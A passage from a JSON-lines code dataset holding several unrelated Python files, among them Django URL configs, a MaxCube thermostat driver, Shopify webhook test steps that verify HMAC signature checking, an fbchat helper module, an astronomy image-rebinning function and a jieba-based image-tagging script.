new_free_rank, url, star_rating, ratings, release_date, last_update_date], index = df.columns)\n df = df.append(ser, ignore_index=True)\n print('{} done'.format(len(df)))\n except:\n break\nbrowser.quit()\ndf.to_excel('word_game_andoid_free.xlsx')\n","sub_path":"word_game_android_free.py","file_name":"word_game_android_free.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"162937523","text":"from django.conf.urls import patterns, url\nfrom staticpages import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='home'),\n url(r'^api(.html)?$', views.api, name='api'),\n url(r'^feedback$', views.feedback, name='feedback'),\n url(r'^feedback_submit$', views.feedback_submit, name='feedback_submit'),\n url(r'^feedback_sent$', views.feedback_sent, name='feedback_sent'),\n)\n","sub_path":"courtfinder/staticpages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"317469328","text":"import base64\nfrom maxcube.device import \\\n MaxDevice, \\\n MAX_DEVICE_MODES\n\n\nclass MaxThermostat(MaxDevice):\n def __init__(self):\n super(MaxThermostat, self).__init__()\n self.mode = None\n self.mode_name = None\n self.min_temperature = None\n self.max_temperature = None\n self.actual_temperature = None\n self.target_temperature = None\n self.valve_position = None\n\n def todict(self):\n d = super(MaxThermostat, self).todict()\n h = {\n \"mode\": self.mode_name,\n \"mode_id\": self.mode,\n \"min_temperature\": self.min_temperature,\n \"max_temperature\": self.max_temperature,\n \"actual_temperature\": self.actual_temperature,\n \"target_temperature\": self.target_temperature,\n \"valve_position\": self.valve_position\n }\n return { **d, **h }\n\n\n def set_temperature(self, temperature, mode=\"manual\"):\n self.cube.logger.debug('Setting temperature for %s to %s!' %(self.rf_address, temperature))\n mode_id = MAX_DEVICE_MODES.index(mode)\n rf_address = self.rf_address\n if len(rf_address) < 6:\n rf_address = '0' + rf_address\n room = str(self.room_id)\n if self.room_id < 10:\n room = '0' + room\n target_temperature = int(temperature * 2) + (mode_id << 6)\n\n byte_cmd = '000440000000' + rf_address + room + hex(target_temperature)[2:]\n self.cube.logger.debug('Request: ' + byte_cmd)\n command = 's:' + base64.b64encode(bytearray.fromhex(byte_cmd)).decode('utf-8') + '\\r\\n'\n self.cube.logger.debug('Command: ' + command)\n\n self.cube.connection.connect()\n self.cube.connection.send(command)\n self.cube.logger.debug('Response: ' + self.cube.connection.response)\n a = self.cube.parse_s_message(self.cube.connection.response)\n self.cube.connection.disconnect()\n if a.result:\n self.target_temperature = int(temperature * 2) / 2.0\n a.device = self\n return a\n","sub_path":"maxcube/thermostat.py","file_name":"thermostat.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"83812061","text":"from django.conf.urls import patterns, include, url\nfrom Supplier.forms import SupplierDeliveryForm\nfrom Indigo7.views import SimpleViewListView, SimpleViewDetailView, SimpleViewCreateView, SimpleViewDeleteView, SimpleViewUpdateView\nfrom Supplier.models import SupplierDelivery\n\n\nurlpatterns = patterns('Supplier.views', \n url(r'^$',\n SimpleViewListView.as_view(model=SupplierDelivery, paginate_by=14), \n name='supplier_delivery_list'),\n \n url(r'^create/$',\n SimpleViewCreateView.as_view(model=SupplierDelivery, \n form_class=SupplierDeliveryForm, \n success_url='supplier_delivery_list'), \n name='supplier_delivery_create_delivery'), \n \n url(r'^update/(?P\\d+)/$',\n SimpleViewUpdateView.as_view(model=SupplierDelivery, \n form_class=SupplierDeliveryForm, \n success_url='supplier_delivery_list'), \n name='supplier_delivery_update_delivery'), \n \n url(r'^view/(?P\\d+)/$',\n SimpleViewDetailView.as_view(\n model=SupplierDelivery, \n ), \n name='supplier_delivery_view'), \n\n url(r'^delete/(?P\\d+)/$',\n SimpleViewDeleteView.as_view(model=SupplierDelivery, \n success_url='supplier_delivery_list'), \n name='supplier_delivery_delete_delivery'), \n)","sub_path":"Supplier/urlconf/delivery.py","file_name":"delivery.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"395285361","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 2 21:58:05 2019\n\n@author: jocel\n\"\"\"\n\n#Exercise 2\nprices = {\n\"banana\": 4,\n\"apple\": 2,\n\"orange\": 1.5,\n\"pear\": 3\n}\n\nstock = {\n \"banana\" : 6,\n \"apple\" : 0,\n \"orange\" : 32,\n \"pear\" : 15,\n}\n\nfor i in prices:\n print(i)\n print(\"price: \", prices[i])\n print(\"stock: \", stock[i])\n \ntotal = 0\nfor i in prices: \n total += prices[i] * stock[i]\nprint(total)","sub_path":"List-and-Dictionary-Exercise2.py","file_name":"List-and-Dictionary-Exercise2.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"102793862","text":"import base64\nimport datetime\nimport hashlib\nimport hmac\nimport httplib\nimport json\nfrom datetime import timedelta\n\nimport pytz\nfrom flask import current_app\nfrom lettuce import step, world\nfrom nose.tools import assert_equals, assert_true, assert_is_not_none\n\nfrom constants import *\nfrom controllers.order import create_review_requests_for_order\nfrom features.steps.core import TestAPI\nfrom features.steps.mocks import create_new_order\nfrom lib import get_utcnow\nfrom store import database\n\n\n@step('Someone tries to fake a shopify webhook request')\ndef fake_webhook_request(step):\n data = json.dumps({})\n sha256 = \"FAKE_SHA_SIGNATURE\"\n response = world.client.post(\"/platform/shopify/products/create\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Return invalid signature')\ndef return_invalid_signature(step):\n assert world.local.response.status_code == 403\n step.behave_as('I see the response contains \"{response}\"'.format(response=\"Invalid signature.\"))\n\n\n@step('Shopify notifies us about a product creation')\ndef shopify_webhook_product_creation(step):\n data = json.dumps(REQUEST_NEW_PRODUCT)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/products/create\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Shopify notifies us about a product update')\ndef shopify_webhook_product_update(step):\n data = json.dumps(REQUEST_PRODUCT_UPDATE)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/products/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Shopify notifies us about a product 12345 deletion')\ndef shopify_webhook_product_delete(step):\n data = json.dumps(REQUEST_PRODUCT_DELETE)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/products/delete\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('We create a corresponding new product in our database')\ndef webhook_creates_product(step):\n assert world.local.response.status_code == 201\n product = database.Product.get_one_by(platform_product_id=str(NEW_PRODUCT_ID))\n world.product = product\n assert product.name == NEW_PRODUCT_NAME\n assert product.description == NEW_PRODUCT_DESCRIPTION\n assert product.image_url == NEW_PRODUCT_IMAGE_URL\n assert product.vendor == NEW_PRODUCT_VENDOR\n assert product.categories == NEW_PRODUCT_CATEGORIES\n\n\n@step('Product with id 12345 has variants in database')\ndef webhook_creates_product_variants(step):\n assert_equals(len(world.product.variants), 2)\n assert_is_not_none(database.ProductVariant.get_by(id=1234567))\n assert_is_not_none(database.ProductVariant.get_by(id=1234568))\n\n\n@step('We update the corresponding product in our database')\ndef webhook_updates_product(step):\n assert world.local.response.status_code == 200\n product = database.Product.get_one_by(platform_product_id=str(NEW_PRODUCT_ID))\n assert product.name == NEW_PRODUCT_NAME_UPDATED\n\n\n@step(\"A product already exists with platform_product_id 12345\")\ndef product_already_exists_12345(step):\n shop = database.Shop.get_one()\n product1 = database.Product.create(shop=shop,\n platform_product_id=NEW_PRODUCT_ID,\n name=NEW_PRODUCT_NAME,\n description=NEW_PRODUCT_DESCRIPTION,\n image_url=NEW_PRODUCT_IMAGE_URL,\n vendor=NEW_PRODUCT_VENDOR,\n categories=NEW_PRODUCT_CATEGORIES)\n\n product2 = database.Product.create(shop=shop,\n platform_product_id=NEW_PRODUCT2_ID,\n name=NEW_PRODUCT2_NAME,\n description=NEW_PRODUCT2_DESCRIPTION,\n image_url=NEW_PRODUCT2_IMAGE_URL,\n vendor=NEW_PRODUCT2_VENDOR,\n categories=NEW_PRODUCT2_CATEGORIES)\n\n product_1_variant_1 = database.ProductVariant.create(platform_variant_id=PRODUCT_VARIANT_1_ID,\n name=PRODUCT_1_VARIANT_1_NAME,\n price=PRODUCT_1_VARIANT_1_PRICE,\n currency=PRODUCT_VARIANT_CURRENCY)\n product_1_variant_2 = database.ProductVariant.create(platform_variant_id=PRODUCT_VARIANT_2_ID,\n name=PRODUCT_1_VARIANT_2_NAME,\n price=PRODUCT_1_VARIANT_2_PRICE,\n currency=PRODUCT_VARIANT_CURRENCY)\n product1.variants.append(product_1_variant_1)\n product1.variants.append(product_1_variant_2)\n\n product_2_variant_1 = database.ProductVariant.create(platform_variant_id=PRODUCT_VARIANT_3_ID,\n name=PRODUCT_2_VARIANT_1_NAME,\n price=PRODUCT_2_VARIANT_1_PRICE,\n currency=PRODUCT_VARIANT_CURRENCY)\n product2.variants.append(product_2_variant_1)\n\n database.add(product1)\n database.add(product2)\n database.push()\n\n\n@step(\"A product already exists with platform_product_id 123 for plugin page\")\ndef product_already_exists_123(step):\n shop = database.Shop.get_one()\n product1 = database.Product.create(shop=shop,\n platform_product_id=NEW_PRODUCT_ID_PLUGIN,\n name=NEW_PRODUCT_NAME,\n description=NEW_PRODUCT_DESCRIPTION,\n image_url=NEW_PRODUCT_IMAGE_URL,\n vendor=NEW_PRODUCT_VENDOR,\n categories=NEW_PRODUCT_CATEGORIES)\n\n product_1_variant_1 = database.ProductVariant.create(platform_variant_id=PRODUCT_VARIANT_1_ID,\n name=PRODUCT_1_VARIANT_1_NAME,\n price=PRODUCT_1_VARIANT_1_PRICE,\n currency=PRODUCT_VARIANT_CURRENCY)\n product_1_variant_2 = database.ProductVariant.create(platform_variant_id=PRODUCT_VARIANT_2_ID,\n name=PRODUCT_1_VARIANT_2_NAME,\n price=PRODUCT_1_VARIANT_2_PRICE,\n currency=PRODUCT_VARIANT_CURRENCY)\n product1.variants.append(product_1_variant_1)\n product1.variants.append(product_1_variant_2)\n\n database.add(product1)\n database.push()\n\n\n@step('Review requests exist for an order id (\\d+)')\ndef create_review_requests(step, order_id):\n create_review_requests_for_order(order_id)\n\n\n@step(\"A product already exists with platform_product_id 666\")\ndef product_already_exists_666(step):\n product = database.Product.create(platform_product_id=NEW_ORDER_PRODUCT_2_ID)\n\n product_variant_3 = database.ProductVariant.create(platform_variant_id=PRODUCT_VARIANT_3_ID)\n\n product.variants.append(product_variant_3)\n database.add(product)\n database.push()\n\n\n@step(\"There is only one product with platform_product_id 12345\")\ndef webhook_does_not_create_a_new_product(step):\n products = database.Product.get_by(platform_product_id=str(NEW_PRODUCT_ID))\n assert len(products) == 1\n\n\n@step(\"A product does not exist platform_product_id 12345\")\ndef product_does_not_exist(step):\n products = database.Product.get_all_by(platform_product_id=str(NEW_PRODUCT_ID))\n assert len(products) == 0\n\n\n@step('A product with platform_product_id 12345 has ([^\"]*) variants')\ndef product_has_x_variants(step, variant_count):\n product = database.Product.get_one_by(platform_product_id=str(NEW_PRODUCT_ID))\n assert len(product.get_variants()) == int(variant_count)\n\n\n@step(\"Product variants for platform_product_id 12345 do not exist\")\ndef product_variants_does_not_exist(step):\n product_variants = database.ProductVariant.get_all_by(product_id=12345)\n assert len(product_variants) == 0\n\n\n@step('Shopify notifies us about product update with 1 more variant')\ndef shopify_webhook_product_variant_add(step):\n data = json.dumps(REQUEST_PRODUCT_UPDATE_ADD_VARIANT)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/products/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Shopify notifies us about product update removing a variant')\ndef shopify_webhook_product_variant_remove(step):\n data = json.dumps(REQUEST_PRODUCT_UPDATE_REMOVE_VARIANT)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/products/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Shopify notifies us about product update changing a variant 1234567 name')\ndef shopify_webhook_product_variant_change(step):\n data = json.dumps(REQUEST_PRODUCT_UPDATE_CHANGE_VARIANT)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/products/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step(\"A product variant 1234567 has a new name\")\ndef product_variant_has_new_name(step):\n product_variant = database.ProductVariant.get_one_by(platform_variant_id=str(PRODUCT_VARIANT_1_ID))\n assert product_variant.name == NEW_PRODUCT_VARIANT_1_NAME\n\n\n@step(\"A user already exists with email johny@hbo.com\")\ndef user_order_already_exists(step):\n user = database.User.create(email=NEW_ORDER_USER_EMAIL)\n database.add(user)\n database.push()\n\n\n@step(\"There is only one user with email johny@hbo.com\")\ndef user_order_only_one(step):\n users = database.User.get_all_by(email=NEW_ORDER_USER_EMAIL)\n assert_equals(len(users), 1)\n\n\n@step('Shopify notifies us about an order creation')\ndef shopify_webhook_order_creation(step):\n data = json.dumps(REQUEST_NEW_ORDER)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/orders/create\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step(\n \"We get notified by Shopify about an order creation with (?P.*), (?P.*), (?P.*), (?P.*), (?P.*)\")\ndef shopify_webhook_order_creation_with_IP(step, platform_id, ip, days_back, total_paid, currency):\n created_at = str(get_utcnow() + timedelta(days=int(str(days_back))))\n data = json.dumps(create_new_order(platform_id, ip, created_at, total_paid, currency))\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/orders/create\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Shopify notifies us about an order creation with ip adress')\ndef shopify_webhook_order_creation(step):\n data = json.dumps(REQUEST_NEW_ORDER)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/orders/create\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('We create a corresponding new order in our database')\ndef webhook_creates_order(step):\n assert_equals(world.local.response.status_code, httplib.CREATED)\n order = database.Order.get_one_by(platform_order_id=str(NEW_ORDER_ID))\n assert_equals(order.platform_order_id, str(NEW_ORDER_ID))\n # 2016-09-02T13:32:15-04:00\n assert_equals(order.purchase_timestamp, datetime.datetime(2016, 9, 2, 17, 32, 15, tzinfo=pytz.utc))\n assert_equals(order.status, database.Order.ORDER_STATUS_PURCHASED)\n assert_equals(order.user.name, NEW_ORDER_USER_NAME)\n assert_equals(len(order.product_variants), 2)\n assert_equals(order.product_variants[0].platform_variant_id, str(NEW_ORDER_PRODUCT_1_VARIANT_1_ID))\n assert_equals(order.product_variants[1].platform_variant_id, str(NEW_ORDER_PRODUCT_2_VARIANT_1_ID))\n\n\n@step('Shopify notifies us about an order fulfillment')\ndef shopify_webhook_order_fulfillment(step):\n data = json.dumps(REQUEST_FULFILLED_ORDER)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/orders/fulfill\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step(\"Shopify notifies us about an order cancelation\")\ndef shopify_webhook_order_cancelation(step):\n data = json.dumps(REQUEST_CANCELED_ORDER)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/orders/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step(\"An order already exists with platform_order_id 56789\")\ndef order_already_exists(step):\n user = database.User.create(name=NEW_ORDER_USER_NAME,\n email=NEW_ORDER_USER_EMAIL)\n product_variant1 = database.ProductVariant.get_one_by(platform_variant_id=NEW_ORDER_PRODUCT_1_VARIANT_1_ID)\n product_variant3 = database.ProductVariant.get_one_by(platform_variant_id=NEW_ORDER_PRODUCT_2_VARIANT_1_ID)\n shop = database.Shop.get_one()\n order = database.Order.create(shop=shop,\n platform_order_id=NEW_ORDER_ID,\n purchase_timestamp=NEW_ORDER_PURCHASE_TIME,\n status=database.Order.ORDER_STATUS_PURCHASED,\n user=user)\n\n order.product_variants.append(product_variant1)\n order.product_variants.append(product_variant3)\n database.add(order)\n database.push()\n\n\n@step('We update the corresponding order in our database')\ndef webhook_fulfils_order(step):\n assert_equals(world.local.response.status_code, 200)\n order = database.Order.get_one_by(platform_order_id=str(NEW_ORDER_ID))\n assert_equals(order.status, database.Order.ORDER_STATUS_SHIPPED)\n\n\n@step(\"We cancel the corresponding order in our database\")\ndef webhook_cancels_order(step):\n assert_equals(world.local.response.status_code, 200)\n order = database.Order.get_one_by(platform_order_id=str(NEW_ORDER_ID))\n assert_equals(order.status, database.Order.ORDER_STATUS_FAILED)\n\n\n@step('Shopify notifies us about an app uninstallation')\ndef shopify_webhook_app_uninstall(step):\n data = json.dumps(REQUEST_APP_UNINSTALLATION)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/app/uninstalled\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step('Shopify notifies us about theme publish')\ndef shopify_webhook_themes_publish(step):\n data = json.dumps(REQUEST_SHOP_THEME_PUBLISH)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/themes/publish\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n\n@step(\"We return OK code\")\ndef ok_code(step):\n assert_equals(world.local.response.status_code, httplib.OK)\n\n\n@step('We mark the shop as uninstalled')\ndef webhook_uninstalls_app(step):\n assert_equals(world.local.response.status_code, httplib.OK)\n shop = database.Shop.get_one(deleted=True)\n assert_equals(len(shop.products), 2)\n for product in shop.products:\n assert_true(product.deleted)\n assert_equals(len(shop.orders), 1)\n for order in shop.orders:\n assert_true(order.deleted)\n\n\n@step('The plugin for this shop returns blank 200')\ndef plugin_returns_404(step):\n TestAPI.i_visit_the_url(\"/plugins/product/get_by=platform_product_id&platform_product_id=12345\")\n TestAPI.assert_true(world.local.response.data, '')\n TestAPI.assert_true(world.local.response.status_code, httplib.OK)\n\n\n@step(\"An order does not exist platform_order_id 56789\")\ndef order_does_not_exist(step):\n orders = database.Order.get_all_by(platform_order_id=str(NEW_ORDER_ID))\n assert len(orders) == 0\n\n\n@step(\"There is only one order with platform_order_id 56789\")\ndef webhook_does_not_create_a_new_order(step):\n orders = database.Order.get_by(platform_order_id=str(NEW_ORDER_ID))\n assert len(orders) == 1\n\n\n@step(\"A webhook for shop update fires to change the owner of the shop\")\ndef webhook_update_shop_v1(step):\n data = json.dumps(REQUEST_SHOP_UPDATE)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/shops/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n@step(\"A webhook for shop update fires to change the plan of the shop\")\ndef webhook_update_shop_v2(step):\n data = json.dumps(REQUEST_SHOP_UPDATE_PLAN)\n sha256 = base64.b64encode(\n hmac.new(current_app.config.get('SHOPIFY_APP_SECRET'), msg=data, digestmod=hashlib.sha256).digest())\n response = world.client.post(\"/platform/shopify/shops/update\",\n content_type=\"application/json\",\n headers={\n 'X-Shopify-Hmac-SHA256': sha256,\n \"X-Shopify-Shop-Domain\": SHOPIFY_DOMAIN\n\n },\n data=data)\n world.local.response = response\n\n","sub_path":"features/steps/shopify/shopify_webhooks.py","file_name":"shopify_webhooks.py","file_ext":"py","file_size_in_byte":23370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"396436467","text":"import sys\nimport attr\nimport logging\nimport aenum\n\nlog = logging.getLogger(\"fbchat\")\n\n# Enable kw_only if the python version supports it\nkw_only = sys.version_info[:2] > (3, 5)\n\n#: Default attrs settings for classes\nattrs_default = attr.s(slots=True, kw_only=kw_only)\n\n\nclass Enum(aenum.Enum):\n \"\"\"Used internally to support enumerations\"\"\"\n\n def __repr__(self):\n # For documentation:\n return \"{}.{}\".format(type(self).__name__, self.name)\n\n @classmethod\n def _extend_if_invalid(cls, value):\n try:\n return cls(value)\n except ValueError:\n log.warning(\n \"Failed parsing {.__name__}({!r}). Extending enum.\".format(cls, value)\n )\n aenum.extend_enum(cls, \"UNKNOWN_{}\".format(value).upper(), value)\n return cls(value)\n\n\n# Frozen, so that it can be used in sets\n@attr.s(frozen=True, slots=True, kw_only=kw_only)\nclass Image:\n #: URL to the image\n url = attr.ib(type=str)\n #: Width of the image\n width = attr.ib(None, type=int)\n #: Height of the image\n height = attr.ib(None, type=int)\n\n @classmethod\n def _from_uri(cls, data):\n return cls(\n url=data[\"uri\"],\n width=int(data[\"width\"]) if data.get(\"width\") else None,\n height=int(data[\"height\"]) if data.get(\"height\") else None,\n )\n\n @classmethod\n def _from_url(cls, data):\n return cls(\n url=data[\"url\"],\n width=int(data[\"width\"]) if data.get(\"width\") else None,\n height=int(data[\"height\"]) if data.get(\"height\") else None,\n )\n\n @classmethod\n def _from_uri_or_none(cls, data):\n if data is None:\n return None\n if data.get(\"uri\") is None:\n return None\n return cls._from_uri(data)\n\n @classmethod\n def _from_url_or_none(cls, data):\n if data is None:\n return None\n if data.get(\"url\") is None:\n return None\n return cls._from_url(data)\n","sub_path":"fbchat/_core.py","file_name":"_core.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"445334722","text":"#\n# Required CIAO 4.5/contrib package\n#\nfrom ciao_contrib.runtool import *\nimport os\nfrom math import floor, ceil, modf\n\n# rebin_img function to make an image with the center pixel at the region centroid\n# infile - input psf event file from SAOtrace\n# outfile - output file, binned psf image\n# binsize - binning of the image\n# nsize - size of the image in image pixels\n# xcenter, ycenter - initial centroid\n\n\ndef rebin_img(\n infile=\"evt2.fits\",\n outfile=\"test.fits\",\n binsize=0.25,\n nsize=64,\n xcen=4060.0,\n ycen=4090.0,\n):\n\n N = nsize\n B = binsize\n\n xcen3 = xcen\n ycen3 = ycen\n # nearest half-pixel vertex\n # xcen3 = floor(xcen-B/2.0) + round(modf(xcen- B/2.0)[0]*2.0/B)*B/2.0\n # ycen3 = floor(ycen-B/2.0) + round(modf(ycen- B/2.0)[0]*2.0/B)*B/2.0\n\n px = floor((xcen - floor(xcen)) / binsize) * binsize\n xcen3 = floor(xcen3) + px\n #\n py = floor((ycen - floor(ycen)) / binsize) * binsize\n ycen3 = floor(ycen3) + py\n\n ##get the nearest vertex\n # if abs(xcen3-xcen)>abs(xcen3-xcen+B/2):\n # xcen3=xcen3+B/2\n #\n # if abs(ycen3-ycen)>abs(ycen3-ycen+B):\n # ycen3=ycen3+B/2\n # print(xcen3,ycen3,xcen4,ycen4,xcen,ycen)\n\n if N % 2 == 0:\n xmin = round(xcen3 - (N * B) * 0.5, 2)\n xmax = round(xcen3 + (N * B) * 0.5, 2)\n ymin = round(ycen3 - (N * B) * 0.5, 2)\n ymax = round(ycen3 + (N * B) * 0.5, 2)\n else:\n xmin = round(xcen3 - ((N - 1) * B) * 0.5, 2)\n xmax = round(xcen3 + ((N + 1) * B) * 0.5, 2)\n ymin = round(ycen3 - ((N - 1) * B) * 0.5, 2)\n ymax = round(ycen3 + ((N + 1) * B) * 0.5, 2)\n newfile = \"{}[bin x={}:{}:#{},y={}:{}:#{}][opt type=i4]\".format(\n infile, xmin, xmax, N, ymin, ymax, N\n )\n print(newfile)\n\n dmcopy.punlearn()\n dmcopy(newfile, outfile, clobber=True)\n return (xcen3, ycen3)\n","sub_path":"input_prep/rebin_img.py","file_name":"rebin_img.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"399992870","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport jieba\nfrom app.models import User, R_Img_Label, R_User_Img, R_User_Img_Label\nfrom app import db\ncount_users=10\ndef is_chinese(data):\n\tfor ch in data:\n\t\tif '\\u4e00' <= ch <= '\\u9fff':\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\ndef cut_chinese_words(words):\n\t'''\n\twords: [{'label_name': '}]\n\t'''\n\tdata=[]\n\tfor word in words:\n\t\tlabel=word.get('label_name')\n\t\tdata.append(word)\n\t\tif label is None:\n\t\t\tcontinue\n\t\tif is_chinese(label):\n\t\t\t'''默认是搜索引擎模式 提取更多信息'''\n\t\t\tseg_list=jieba.cut_for_search(label)\n\t\t\tlabs=[a for a in seg_list]\n\t\t\tfor lab in labs:\n\t\t\t\tinfo={}\n\t\t\t\tinfo['label_name']=lab\n\t\t\t\tdata.append(info)\n\treturn data\n\n\n\ndef tag_images(DN, DM, DX):\n\tu1=1\n\tu2=2\n\tplabels=[]\n\tfor i in DN:\n\t\tdata = DX.get(i)\n\t\tfor j in data:\n\t\t\tp = [int(i)]\t\t\t#图片id\n\t\t\t'''\n\t\t\tif DM[i] - u1 == 0:\n\t\t\t\tu1=u1+1\n\t\t\ttemp=float(DN[i]*DN[i]*DM[i])/pow((DM[i]-u1),2)\n\t\t\tvalue=float(data[j]*data[j])/float(DN[i]*DM[i])*pow(temp,1.0/u2)\n\t\t\t'''\n\t\t\tvalue=pow(data[j],2)*pow(u1,1.0/u2)*pow(DM[i]*DN[i], (1.0/u2 - 1))\n\t\t\tp.append(int(j))\t\t\t#标签id\n\t\t\tp.append(value)\n\t\t\tplabels.append(p)\n\treturn plabels\n\n\ndef up_R_Img_Label():\n\tcount_imgs_users={}\t\t\t\t\t\t#某张图片对应的标签人数\t{'img_id': num}\n\tfor a in R_User_Img.query.all():\n\t\tcount_imgs_users[str(a.img_id)]=R_User_Img.query.filter_by(img_id=a.img_id).count()\n\timg_ids=[int(a) for a in count_imgs_users]\n\tcount_imgs_total_label={}\n\tcount_imgs_label_num={}\n\tfor img_id in img_ids:\n\t\tsum=0\n\t\tlabel_data={}\n\t\tfor a in R_Img_Label.query.filter_by(img_id=img_id):\n\t\t\tsum = sum + a.count\n\t\t\tlabel_data[str(a.label_id)]=a.count\n\t\tcount_imgs_total_label[str(img_id)] = sum\n\t\tcount_imgs_label_num[str(img_id)] = label_data\n\n\tresult = 